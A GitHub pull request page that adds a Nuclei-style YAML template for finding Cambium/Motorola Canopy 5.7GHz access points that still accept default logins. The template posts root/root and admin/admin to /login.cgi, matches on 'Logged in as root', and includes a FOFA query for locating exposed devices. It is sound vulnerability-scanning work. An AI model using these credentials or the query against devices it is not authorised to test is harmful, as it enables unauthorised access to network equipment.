Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added canopy-access-point-default-login.yaml #9845

Merged
merged 4 commits into from
May 24, 2024
Merged
Changes from 3 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
id: cambium-networks-default-login

info:
name: Canopy 5.7GHz Access Point - Default Login
author: defektive
severity: high
description: |
Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered.
metadata:
verified: true
max-request: 1
fofa-query: title="Welcome to Canopy"
tags: default-login,cambium-networks

http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

&Session=0&CanopyUsername={{username}}&CanopyPassword={{password}}&login=Login&webguisubmit=submit

attack: pitchfork
payloads:
username:
- root
- admin
password:
- root
- admin

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Logged in as root"
condition: and

- type: status
status:
- 200
Loading